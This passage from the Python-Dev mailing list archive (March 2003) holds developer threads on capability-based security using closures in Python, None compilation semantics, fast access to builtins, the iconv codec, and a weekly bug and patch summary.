> > Maybe every Python object should have a flag which
> > can be set to prevent introspection -- like the current
> > restricted execution mechanism, but on a per-object
> > basis. Then any object could be used as a capability.
>
> Yes, but not a very useful one.  For example, given a file,
> you often want to create a "file read" capability which is
> an object that allows reading the file but not writing the file.
> Just preventing introspection isn't enough.

All right.  Let me provide an example; maybe this can help ground
the discussion a bit.  We seem to be doing a lot of dancing around
the issue of what a capability is.

In my view, it's a red herring to discuss whether or not a
particular object "is a capability" or not.  It's like asking
whether something is an "object".  Capabilities are a discipline
under which objects are used -- it's better to think of them as
a technique or a style of programming.

What is at issue here (IMHO) is "how might Python change to
facilitate this style of programming?"

(The analogy with object-oriented programming holds here also.
Even if Python didn't have a "class" keyword, you could still
program in an object-oriented style.  In fact, the C implementation
of Python is clearly object-oriented, even though C has no features
specifically designed for OOP.  But adding "class" made it a lot
easier to do a particular style of object-oriented programming in
Python.  Unfortunately, the particular style encouraged by Python's
"class" keyword doesn't work so well for capability-style programming,
because all instance state is public.  But Python's "class" is not
the only way to do object-oriented programming -- see below.)

Okay, at last to the example, then.

Here is one way to program in a capability style using today's
Python, relying on no changes to the interpreter.  This example
defines a "class" called DirectoryReader that provides read-only
access to only a particular subtree of the filesystem.


    import os

    class Namespace:
        def __init__(self, *args, **kw):
            for value in args:
                self.__dict__[value.__name__] = value
            for name, value in kw.items():
                self.__dict__[name] = value

    class ReadOnly(Namespace):
        def __setattr__(self, name, value):
            raise TypeError('read-only namespace')

    def FileReader(path, name):
        self = Namespace(file=open(path, 'r'))

        def __repr__():
            return '<FileReader %r>' % name

        def reset():
            self.file.seek(0)

        return ReadOnly(__repr__, reset, self.file.read, self.file.close)

    def DirectoryReader(path, name):
        def __repr__():
            return '<DirectoryReader %r>' % name

        def list():
            return os.listdir(path)

        def readfile(name):
            fullpath = os.path.join(path, name)
            if os.path.isfile(fullpath):
                return FileReader(fullpath, name)

        def getdir(name):
            fullpath = os.path.join(path, name)
            if os.path.isdir(fullpath):
                return DirectoryReader(fullpath, name)

        return ReadOnly(__repr__, list, readfile, getdir)


Now, if we pass an instance of DirectoryReader to code running in
restricted mode, i think this is actually secure.

Specifically, the only introspective attributes we have to disallow, in
order for these objects to enforce their intended restrictions, are
im_self and func_globals.  Of course, we still have to hide __import__ and
sys.modules if we want to prevent code from obtaining access to the
filesystem in other ways.

Hiding __dict__, while it has no impact on restricting filesystem access,
allows us to pass the same DirectoryReader object to two clients without
inadvertently creating a communication channel between them.


-- ?!ng


From tim_one@email.msn.com  Sun Mar 30 02:24:29 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sat, 29 Mar 2003 21:24:29 -0500
Subject: [Python-Dev] Compiler treats None both as a constant and variable
In-Reply-To: <002001c2f636$77ad2ce0$e60ca044@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEAOEEAB.tim_one@email.msn.com>

[Raymond Hettinger]
> >>> def f():
>  None
>
> >>> dis(f)
> 2           0 LOAD_GLOBAL              0 (None)
>               3 POP_TOP
>               4 LOAD_CONST               0 (None)
>               7 RETURN_VALUE
>
> >>> None = 1
> <stdin>:1: SyntaxWarning: assignment to None
> >>> f() == None
> False
>
>
> Is this a bug?

It's arguable, but it's always been this way, and is so boring that nobody
has bothered to argue about it before <wink>.

It's clear that explicit references to names must follow "the usual" name
resolution rules, so you can't gripe about the LOAD_GLOBAL in this function:
None is the name of a builtin, and in the language as currently defined,
builtin names can be shadowed by globals or locals.

What's arguable is the LOAD_CONST, which is generated for the implicit
reference to None.  The meaning of the Ref Man's

    A call always returns some value, possibly None, unless it raises an
    exception.  How this value is computed depends on the type of the
    callable object.

is arguably arguable, but I don't think *reasonably* so.  To me it clearly
intends "the" None, not whatever object you get by evaluating name "None"
inside the callable.  Likewise when it says the default value of
object.__doc__ is None, I think it also clearly means "the" None.

> Should the compiler use the GLOBAL in both places?

For backward compatibility it has to retain the LOAD_CONST.  In this
specific example, it doesn't matter whether the first is LOAD_CONST, or
LOAD_GLOBAL, or simply thrown away, since the

    LOAD_GLOBAL 0
    POP_TOP

pair has no visible effect.  If it were a more interesting function, like

    def f():
        global aglobal
        aglobal = None

then for backward compatibility it would have to remain LOAD_GLOBAL.

> Or, is it reasonable to use CONST in both places?

Not today, but we should be moving in that direction.  IMO, None should
become a keyword.


From skip@mojam.com  Sun Mar 30 13:00:29 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 30 Mar 2003 07:00:29 -0600
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200303301300.h2UD0TN06135@manatee.mojam.com>

Bug/Patch Summary
-----------------

379 open / 3499 total bugs (+9)
138 open / 2050 total patches (+7)

New Bugs
--------

Lineno calculation sometimes broken (2003-03-24)
	http://python.org/sf/708901
socket timeouts produce wrong errors in win32 (2003-03-24)
	http://python.org/sf/708927
sgmllib.SGMLParser.reset() problem (2003-03-25)
	http://python.org/sf/709491
IDE stdin doesn't have readlines (2003-03-26)
	http://python.org/sf/710373
Raise IDE output window over splash screen on early crash (2003-03-26)
	http://python.org/sf/710374
math.log(0) differs from math.log(0L) (2003-03-27)
	http://python.org/sf/711019
A large block of commands after an "if" cannot be compiled (2003-03-28)
	http://python.org/sf/711268
htmllib.HTMLParser.anchorlist problem (2003-03-28)
	http://python.org/sf/711632
SEEK_{SET,CUR,END} missing in 2.2.2 (2003-03-29)
	http://python.org/sf/711830
Lookup of Mac error string can mess up resfile chain (2003-03-29)
	http://python.org/sf/711967
gensuitemodule needs to be documented (2003-03-29)
	http://python.org/sf/711986
IDE textwindow scrollbar is over-enthusiastic (2003-03-29)
	http://python.org/sf/711989
IDE needs easy access to builtin help() (2003-03-29)
	http://python.org/sf/711991
OpenBSD 3.2: make altinstall dumps core (2003-03-29)
	http://python.org/sf/712056

New Patches
-----------

add offset to mmap (2003-03-23)
	http://python.org/sf/708374
OpenVMS complementary patches (2003-03-23)
	http://python.org/sf/708495
unchecked return values - compile.c (2003-03-23)
	http://python.org/sf/708604
remove -static option from cygwinccompiler (2003-03-24)
	http://python.org/sf/709178
CALL_ATTR opcode (2003-03-25)
	http://python.org/sf/709744
Make "%c" % u"a" work (2003-03-26)
	http://python.org/sf/710127
Backport to 2.2.2 of codec registry fix (2003-03-27)
	http://python.org/sf/710576
new test_urllib and patch for found urllib bug (2003-03-27)
	http://python.org/sf/711002
Warn about inter-module assignments shadowing builtins (2003-03-28)
	http://python.org/sf/711448
Removing unnecessary lock operations (2003-03-29)
	http://python.org/sf/711835
urllib2 doesn't support non-anonymous ftp (2003-03-29)
	http://python.org/sf/711838
Cause pydoc to show data descriptor __doc__ strings (2003-03-29)
	http://python.org/sf/711902
Obsolete comment in urlparse.py (2003-03-30)
	http://python.org/sf/712124

Closed Bugs
-----------

2.3a2 build fails on Solaris: posixmodule (2003-02-20)
	http://python.org/sf/690317
string.atoi function causing TypeError (2003-03-04)
	http://python.org/sf/697591
Tk 8.4.2 and Tkinter.py _substitue function (2003-03-05)
	http://python.org/sf/698517
_tkinter.c won't build w/o threads? (2003-03-16)
	http://python.org/sf/704641
imap docs: s/criterium/criterion/ (2003-03-17)
	http://python.org/sf/705120
timeouts incompatible w/ line-oriented protocols (2003-03-20)
	http://python.org/sf/707074
DistributionMetaData error ? (2003-03-23)
	http://python.org/sf/708320

Closed Patches
--------------

fix xmlrpclib float marshalling bug (2002-03-19)
	http://python.org/sf/532180
Add _winreg support for Cygwin (2002-05-11)
	http://python.org/sf/554807
New codecs: html, asciihtml (2002-08-03)
	http://python.org/sf/590682
Check for readline 2.2 features (2002-12-29)
	http://python.org/sf/659834
AE Inheritance fixes (2003-03-12)
	http://python.org/sf/702620
Improve code generation (2003-03-20)
	http://python.org/sf/707257
fix for #698517, Tkinter and tk8.4.2 (2003-03-21)
	http://python.org/sf/707701
unchecked return value in import.c (2003-03-22)
	http://python.org/sf/708201


From ping@zesty.ca  Sun Mar 30 17:31:37 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Sun, 30 Mar 2003 11:31:37 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303291829420.10689-100000@server1.lfw.org>
Message-ID: <Pine.LNX.4.33.0303301125530.16301-100000@server1.lfw.org>

On Sat, 29 Mar 2003, Ka-Ping Yee wrote:
> Okay, at last to the example, then.

The following is a better formulation in the capability style --
please ignore the previous one.

The previously posted code allows names to carry authority, which
is a big no-no.  This code gets rid of names altogether in the API
for file access; it's better to deal with just objects.

    import os, __builtin__

    class Namespace:
        def __init__(self, *args, **kw):
            for value in args:
                self.__dict__[value.__name__] = value
            for name, value in kw.items():
                self.__dict__[name] = value

    class ImmutableNamespace(Namespace):
        def __setattr__(self, name, value):
            raise TypeError('read-only namespace')

    def ReadStream(file, name):
        def __repr__():
            return '<ReadStream %r>' % name

        return ImmutableNamespace(__repr__, file.read, file.close, name=name)

    def FileReader(path, name):
        def __repr__():
            return '<FileReader %r>' % name

        def open():
            return ReadStream(__builtin__.open(path, 'r'), name)

        def getsize():
            return os.path.getsize(path)

        def getmtime():
            return os.path.getmtime(path)

        return ImmutableNamespace(__repr__, open, getsize, getmtime, name=name)

    def DirectoryReader(path, name):
        def __repr__():
            return '<DirectoryReader %r>' % name

        def getfiles():
            files = []
            for name in os.listdir(path):
                fullpath = os.path.join(path, name)
                if os.path.isfile(fullpath):
                    files.append(FileReader(fullpath, name))
            return files

        def getdirs():
            dirs = []
            for name in os.listdir(path):
                fullpath = os.path.join(path, name)
                if os.path.isdir(fullpath):
                    dirs.append(DirectoryReader(fullpath, name))
            return dirs

        return ImmutableNamespace(__repr__, getfiles, getdirs, name=name)


-- ?!ng


From paul@prescod.net  Sun Mar 30 18:43:12 2003
From: paul@prescod.net (Paul Prescod)
Date: Sun, 30 Mar 2003 10:43:12 -0800
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303291829420.10689-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303291829420.10689-100000@server1.lfw.org>
Message-ID: <3E873AC0.2050004@prescod.net>

Ka-Ping Yee wrote:
>...
> 
> Specifically, the only introspective attributes we have to disallow, in
> order for these objects to enforce their intended restrictions, are
> im_self and func_globals.  Of course, we still have to hide __import__ and
> sys.modules if we want to prevent code from obtaining access to the
> filesystem in other ways.

It wouldn't have hurt for you to describe how the code achieves security 
by using lexical closure namespaces instead of dictionary-backed 
namespaces. ;) Part of the trick is that the external names are 
irrelevant to the functioning of the object.

I don't understand one thing.

The immutability imposed by the "ImmutableNamespace" trick is easy to 
turn off. But once I turn it off, I couldn't figure out any way to 
violate the security because the closure's variables are invisible to 
any code that is not defined within its block. Why bother with the 
ImmutableNamespace bit at all?

x = DirectoryReader(".", "foo")
print x.getfiles()
del x.__class__.__setattr__
x.foo = 5
del x.getfiles
del x.getdirs
x.getfiles()

Traceback (most recent call last):
   File "../foo.py", line 64, in ?
     x.getfiles()
AttributeError: ImmutableNamespace instance has no attribute 'getfiles'

But I couldn't figure out how to use this to get access to the file 
system because as I said before, the external names are irrelevant to 
the object's implementation. They are early bound.

     def FileReader(path, name):
           ...
           def open2():
             print "open2"
             return open()


direct = DirectoryReader(".", "foo")
file = direct.getfiles()[0]
print file.open2()

FileReaderClass = file.__class__
del FileReaderClass.__setattr__

del file.open
print file.open2()

"open2" binds to open at definition time, not at runtime. I can't see in 
this model how to implement what C++ calls a "friend" class. Even C++ 
and Java have ways that related classes can poke around each others 
internals. So perhaps this is part of what would need to change in 
Python to have a first-class capabilities feature.

If this technique became widespread, Python's restrictions on assigning 
to lexically inherited variables would probably become annoying.

  Paul Prescod


From guido@python.org  Sun Mar 30 19:02:38 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 30 Mar 2003 14:02:38 -0500
Subject: [Python-Dev] Compiler treats None both as a constant and variable
In-Reply-To: "Your message of Sat, 29 Mar 2003 16:02:10 EST."
 <002001c2f636$77ad2ce0$e60ca044@oemcomputer>
References: <002001c2f636$77ad2ce0$e60ca044@oemcomputer>
Message-ID: <200303301902.h2UJ2cU00562@pcp02138704pcs.reston01.va.comcast.net>

> >>> def f():
>  None  
> 
> >>> dis(f)
> 2           0 LOAD_GLOBAL              0 (None)
>               3 POP_TOP             
>               4 LOAD_CONST               0 (None)
>               7 RETURN_VALUE 
> 
> >>> None = 1
> <stdin>:1: SyntaxWarning: assignment to None
> >>> f() == None
> False
> 
> 
> Is this a bug?

Yes, assigning to None is a bug. :-)

> Should the compiler use the GLOBAL in both places?

No, not until we've officially changed the rules.

> Or, is it reasonable to use CONST in both places?

No, not until assigning to None is an error rather than a warning.
This will have to wait until at least 2.4 -- the warning is new in
2.3.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar 30 19:08:19 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 30 Mar 2003 14:08:19 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: "Your message of Sat, 29 Mar 2003 18:27:50 CST."
 <Pine.LNX.4.33.0303291827260.10689-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303291827260.10689-100000@server1.lfw.org>
Message-ID: <200303301908.h2UJ8Jd00667@pcp02138704pcs.reston01.va.comcast.net>

[Ping]
> Having access to a particular instance should certainly not allow
> one to ask it for its class, and then instantiate the class with
> arbitrary constructor arguments.

Assuming the Python code in the class itself is not empowered in any
special way, I don't see why not.  So that suggests that you assume
classes can be empowered.  I can see this for classes implemented in
C; but how can classes implemented in pure Python be empowered?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ping@zesty.ca  Sun Mar 30 20:45:09 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Sun, 30 Mar 2003 14:45:09 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <3E873AC0.2050004@prescod.net>
Message-ID: <Pine.LNX.4.33.0303301433350.22036-100000@server1.lfw.org>

On Sun, 30 Mar 2003, Paul Prescod wrote:
> It wouldn't have hurt for you to describe how the code achieves security
> by using lexical closure namespaces instead of dictionary-backed
> namespaces. ;)

Sorry.  :)  I assumed it would be clear.

> I don't understand one thing.
>
> The immutability imposed by the "ImmutableNamespace" trick is easy to
> turn off. But once I turn it off, I couldn't figure out any way to
> violate the security because the closure's variables are invisible to
> any code that is not defined within its block. Why bother with the
> ImmutableNamespace bit at all?

That immutability isn't required in order to prevent filesystem access.
That immutability is only there to prevent multiple clients of the same
DirectoryReader to use the DirectoryReader as a communication channel.

> del x.__class__.__setattr__

Sneaky.  :)   In restricted mode you wouldn't be able to do that.

> I can't see in
> this model how to implement what C++ calls a "friend" class.

I haven't tried an example that requires that yet, but two classes
could communicate through access to a shared object if they wanted to.

> If this technique became widespread, Python's restrictions on assigning
> to lexically inherited variables would probably become annoying.

The Namespace offers a possible workaround.  I didn't end up using
it in my second code example because none of the objects have
mutable state, but here's how you could do it:

    def Counter():
        self = Namespace()
        self.i = 0

        def next():
            self.i += 1
            return self.i

        return ImmutableNamespace(next)

It would be cool if you could suggest little "security challenges"
to work through.  Given specific scenarios requiring things like
mutability or friend classes, i think trying to implement them in
this style could be very instructive.


-- ?!ng


From ping@zesty.ca  Sun Mar 30 20:53:59 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Sun, 30 Mar 2003 14:53:59 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303301908.h2UJ8Jd00667@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>

On Sun, 30 Mar 2003, Guido van Rossum wrote:
> [Ping]
> > Having access to a particular instance should certainly not allow
> > one to ask it for its class, and then instantiate the class with
> > arbitrary constructor arguments.
>
> Assuming the Python code in the class itself is not empowered in any
> special way, I don't see why not.  So that suggests that you assume
> classes can be empowered.  I can see this for classes implemented in
> C; but how can classes implemented in pure Python be empowered?

In many classes, __init__ exercises authority.  An obvious C type with
the same problem is the "file" type (being able to ask a file object
for its type gets you the ability to open any file on the filesystem).
But many Python classes are in the same position -- they acquire
authority upon initialization.

To pick one at random, consider zipfile.ZipFile.  At first glance it
appears that once you create a ZipFile object with mode "r" you can
hand it off to provide read-only access to a zip archive.  (Even if
a security audit of the code reveals holes, my point is that the API
isn't far from accommodating such a design intent.)

It's useful to be able to separate the authority to read one
particular instance of ZipFile from the authority to instantiate
new ZipFiles, which currently allows you to open any zip file on
the filesystem for reading or writing.


-- ?!ng


From paul@prescod.net  Sun Mar 30 21:59:26 2003
From: paul@prescod.net (Paul Prescod)
Date: Sun, 30 Mar 2003 13:59:26 -0800
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303301433350.22036-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303301433350.22036-100000@server1.lfw.org>
Message-ID: <3E8768BE.8010603@prescod.net>

Ka-Ping Yee wrote:
> On Sun, 30 Mar 2003, Paul Prescod wrote:
> 
>>It wouldn't have hurt for you to describe how the code achieves security
>>by using lexical closure namespaces instead of dictionary-backed
>>namespaces. ;)
> 
> Sorry.  :)  I assumed it would be clear.

It probably is for those following the thread more closely.

> That immutability isn't required in order to prevent filesystem access.

Okay, now I see that that's what you meant about "__dict__". You were 
talking about the object's. namespace in general, not the magical 
attribute named __dict__.

>...
>>del x.__class__.__setattr__
> 
> Sneaky.  :)   

I would have complimented you on the elegance of this proposal but I 
thought it might just be a translation of E's object construct. To 
whatever extent you innovated in creating it, congratulations, it's very 
cool.

 >  ....In restricted mode you wouldn't be able to do that.

I'm not clear (because I've been following the thread with half my 
brain, over quite a few days) whether you are making or have made some 
specific proposal. I guess you are proposing a restricted mode that 
would make this example actually secure as opposed to almost secure. Are 
you also proposing any changes to the syntax?

Also, is restricted mode an interpreter mode or is it scoped by module? 
I can't see how it would work as an interpreter mode because too much 
library code depends on introspectability and hackability of Python objects.

>>I can't see in
>>this model how to implement what C++ calls a "friend" class.
> 
> I haven't tried an example that requires that yet, but two classes
> could communicate through access to a shared object if they wanted to.

This doesn't actually simulate "friend" but that's probably because 
friend makes no sense in a capability system.

It occurs to me after further thought that there are two orthogonal 
problems. First is privacy for the sake of software engineering. Python 
has always rejected that and I'm glad it has (although it makes advocacy 
harder). This sort of privacy just gets in your way when you're trying 
to coerce code into doing what you want when it wasn't designed to. 
Languages like C++ make it really hard to hack when you need to, but 
they don't really prevent you from doing it if you are determined 
enough, so you have the worst of both worlds.

Second, is safety for the sake of security. IF you have chosen the 
capabilities model of security, THEN "friend" perhaps doesn't make 
sense. You either have a capability reference or you don't. The code's 
compile-time class or package is irrelevant. Allowing classes (as 
opposed to objects) to declare each other friends probably only opens up 
security holes.

But if you want to have an example of something like this for the record 
books, perhaps you could implement an iterator over a data structure 
with the caveat that we'd like to implement the iterator and data 
structure in separate files (because sometimes the implementation of 
each could be large and complicated). I think it works like this:

The Data structure is one capability class. The iterator is another. The 
application asks the data structure to create an iterator. The data 
structure creates one and passes some subset of its internal state to 
the new object. It probably could not (and anyway should not) pass a 
pointer to the opaque closure that is its external representation. So 
instead it passes in whatever state variables the iterator is likely to 
be interested in.

If you did want to emulate class-based "friendship" (can't think of why, 
off the top of my head) you could do so like this:

    def tellMeYourSecrets(myfriend):
       if instanceof(myfriend, MyFriendClass):
           return my_namespace()
       else:
           raise SecurityViolation, "Bug off"


The example in Stroustrop is where you want a vector class to be able to 
directly read the internals of a matrix class rather than go through 
inefficient method calls. But in a capabilities universe, even matrices 
can't, in general, see the internals of other matrices. I guess they'd 
have to use the trick above if that was really necessary.

>>If this technique became widespread, Python's restrictions on assigning
>>to lexically inherited variables would probably become annoying.
> 
> 
> The Namespace offers a possible workaround. 

Yes, but why workaround rather than fix? Is there a deep reason Python 
objects can't write to intermediate namespaces? Is it just a little bit 
of extra safety against accidentally overwriting something? This is 
probably overkill in the case of intermediate scopes. And if not, there 
could be a keyword which is like global but for intermediate scopes.

> ...
> It would be cool if you could suggest little "security challenges"
> to work through.  Given specific scenarios requiring things like
> mutability or friend classes, i think trying to implement them in
> this style could be very instructive.

Unfortunately, most of the examples I can come up with seem to be hacks, 
workarounds and optimizations. It isn't surprising that sometimes you 
lose some efficiency or simplicity when working in a secure system.

It makes me wonder about whether E might be less fun, efficient and 
productive than Python because security is embedded so deeply within it? 
(just a speculation...I don't know E) A Python that could go back in 
forth from secure mode to insecure mode might be a nice compromise.

  Paul Prescod


From paul@prescod.net  Sun Mar 30 22:45:38 2003
From: paul@prescod.net (Paul Prescod)
Date: Sun, 30 Mar 2003 14:45:38 -0800
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
Message-ID: <3E877392.9060509@prescod.net>

Ka-Ping Yee wrote:
>...
> In many classes, __init__ exercises authority.  An obvious C type with
> the same problem is the "file" type (being able to ask a file object
> for its type gets you the ability to open any file on the filesystem).
> But many Python classes are in the same position -- they acquire
> authority upon initialization.

Just out of curiosity wouldn't you say that part of the capability zen 
is that capabilities that allow you to turn global strings into objects 
should either not exist or be very segmented from other capabilities? 
(in fact I remember discussing this with you at some Python conference!)

In capdesk, I believe you drag a capability for a file from one window 
to another so that the "drop target" never needs to know or care what 
the filename was.

So it might be better to separate the authority from the __init__ than 
to separate constructors from classes. Arguably it is better to add to 
the library than to change the language.

return securefile("foo.txt").reader()

x = zipfile.Zipfile(securefile("foo.txt").reader())

  Paul Prescod


From guido@python.org  Mon Mar 31 00:09:52 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 30 Mar 2003 19:09:52 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: "Your message of Sun, 30 Mar 2003 14:53:59 CST."
 <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
Message-ID: <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net>

> > [Ping]
> > > Having access to a particular instance should certainly not allow
> > > one to ask it for its class, and then instantiate the class with
> > > arbitrary constructor arguments.

[Guido]
> > Assuming the Python code in the class itself is not empowered in any
> > special way, I don't see why not.  So that suggests that you assume
> > classes can be empowered.  I can see this for classes implemented in
> > C; but how can classes implemented in pure Python be empowered?

[Ping]
> In many classes, __init__ exercises authority.  An obvious C type with
> the same problem is the "file" type (being able to ask a file object
> for its type gets you the ability to open any file on the filesystem).
> But many Python classes are in the same position -- they acquire
> authority upon initialization.

What do you mean exactly by "exercise authority"?  Again, I understand
this for C code, but it would seem that all authority ultimately comes
from C code, so I don't understand what authority __init__() can
exercise.

> To pick one at random, consider zipfile.ZipFile.  At first glance it
> appears that once you create a ZipFile object with mode "r" you can
> hand it off to provide read-only access to a zip archive.  (Even if
> a security audit of the code reveals holes, my point is that the API
> isn't far from accommodating such a design intent.)

But is it really ZipFile.__init__ that exercises the authority?  Isn't
its authority derived from that of the open() function that it calls?

> It's useful to be able to separate the authority to read one
> particular instance of ZipFile from the authority to instantiate
> new ZipFiles, which currently allows you to open any zip file on
> the filesystem for reading or writing.

In what sense is the ZipFile class an entity by itself, rather than
just a pile of Python statements that derive any and all authority
from its caller?

I understand how class ZipFile could exercise authority in a
rexec-based world, if the zipfile module was trusted code.  But I
thought that a capability view of the world doesn't distinguish
between trusted and untrusted code.  I guess I need to understand
better what kind of "barriers" the capability way of life *does* use.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Mon Mar 31 00:34:16 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 31 Mar 2003 12:34:16 +1200 (NZST)
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303281031.30093.aleax@aleax.it>
Message-ID: <200303310034.h2V0YG902190@oma.cosc.canterbury.ac.nz>

Alex Martelli <aleax@aleax.it>:

> It happens, though -- for code whose performance is not important,
> e.g. initialization and "resetting" kind of stuff, a PyRun_String can be
> SO much more concise and handier than meticulous expansion of
> basically the same things into tens of lines of C code...

Nowadays you can let Pyrex do the expansion for you...:-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Mon Mar 31 01:49:48 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 31 Mar 2003 13:49:48 +1200 (NZST)
Subject: [Python-Dev] Re: Fast access to __builtins__
In-Reply-To: <004b01c2f57e$7fb13700$bf11a044@oemcomputer>
Message-ID: <200303310149.h2V1nmM02378@oma.cosc.canterbury.ac.nz>

Raymond Hettinger <python@rcn.com>:

> * Scanning my own sources, it looks like some of the builtins
>    almost never appear inside loops (dir, map, filter, zip, dict, range).
>    The ones that are in loops usually do something simple (int, str,
>    chr, len).  Either way, builtin access never seems to dominate
>    the running time.  OTOH, maybe that's just the way I write code.

That's probably true in the large. However, sometimes one has a tight
little loop that makes lots of calls to a builtin. I've occasionally
improved the speed of something noticeably using the
copy-a-builtin-to-a-local trick.

Maybe for these cases there could be a "builtin" declaration, like
"global" but declaring that something is to be found in the builtin
scope?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Mon Mar 31 02:14:16 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 31 Mar 2003 14:14:16 +1200 (NZST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
Message-ID: <200303310214.h2V2EGW02500@oma.cosc.canterbury.ac.nz>

Ka-Ping Yee <ping@zesty.ca>:

> On Sun, 30 Mar 2003, Guido van Rossum wrote:
> > [Ping]
> > > Having access to a particular instance should certainly not allow
> > > one to ask it for its class, and then instantiate the class with
> > > arbitrary constructor arguments.
> >
> > Assuming the Python code in the class itself is not empowered in any
> > special way, I don't see why not.  So that suggests that you assume
> > classes can be empowered.  I can see this for classes implemented in
> > C; but how can classes implemented in pure Python be empowered?
> 
> In many classes, __init__ exercises authority.  An obvious C type with
> the same problem is the "file" type

Yes, I think the solution to this is not to forbid getting
hold of the class of an object, but to design constructors
so that they don't do anything that might be a security
problem.

In the case of files, that would mean removing the feature
that file("foo") means the same as open("foo"), so that
only the open() function can open arbitrary files.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From python@rcn.com  Mon Mar 31 03:27:07 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 30 Mar 2003 22:27:07 -0500
Subject: [Python-Dev] Re: Fast access to __builtins__
References: <200303310149.h2V1nmM02378@oma.cosc.canterbury.ac.nz>
Message-ID: <006401c2f735$68b64be0$4010a044@oemcomputer>

> Raymond Hettinger <python@rcn.com>:
> > * Scanning my own sources, it looks like some of the builtins
> >    almost never appear inside loops (dir, map, filter, zip, dict, range).
> >    The ones that are in loops usually do something simple (int, str,
> >    chr, len).  Either way, builtin access never seems to dominate
> >    the running time.  OTOH, maybe that's just the way I write code.
> 
[Greg Ewing]
> That's probably true in the large. However, sometimes one has a tight
> little loop that makes lots of calls to a builtin. I've occasionally
> improved the speed of something noticeably using the
> copy-a-builtin-to-a-local trick.

It will have to wait until Py2.4 and the issue will likely be subsumed by 
more sophisticated approaches that optimize all namespace access.  
Jeremy's DList technique looks especially promising.  Similarly, I'm
experimenting with a dict subclass that keeps its values in lists of
length one and can return the container for clients interested in fast
get or set access to the value associated with a given key.

Also, I've been working on a faster design for dictionaries that increases
overall sparseness (meaning fewer collisions) while increasing the density
of entries that fit in a single cash line (reducing the cost of a miss).  
Increasing density involves splitting the arrays of PyDictEntry into separate 
arrays of hashes, keys, and values.  Further, the entries are clustered into 
groups of up to 16 hash values that can fit in a single cache line.  This also
allows for a much tighter inner loop for the lookup function.


Raymond Hettinger


From mal@lemburg.com  Mon Mar 31 07:42:50 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 31 Mar 2003 09:42:50 +0200
Subject: [Python-Dev] iconv codec
Message-ID: <3E87F17A.3080602@lemburg.com>

Since the introduction of the iconv codec there have been numerous
bug reports related to the codec and the lack of cross platform
support for it (ranging from: the codec doesn't compile and the
codec doesn't support standard names for common encodings to
core dumps in the linking phase).

I'd like to question whether the codec is really ready for prime
time yet. Right now it causes people more trouble than it does
any good.

Some examples:
https://sourceforge.net/tracker/?group_id=5470&atid=105470&func=detail&aid=675341
https://sourceforge.net/tracker/?group_id=5470&atid=105470&func=detail&aid=690309
https://sourceforge.net/tracker/?group_id=5470&atid=105470&func=detail&aid=712056
https://sourceforge.net/tracker/?group_id=5470&atid=105470&func=detail&aid=694431

The problem doesn't seem to be related to the code implementation
itself, but rather the varying quality of iconv implementations
out there.

OTOH, without some field testing the codec will never get into
shape for prime time, so perhaps it would be better to only
enable it via a configure option or make a failure to compile
the codec as painless as possible.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 31 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                      1 days left
EuroPython 2003, Charleroi, Belgium:                        85 days left


From perky@fallin.lv  Mon Mar 31 08:04:17 2003
From: perky@fallin.lv (Hye-Shik Chang)
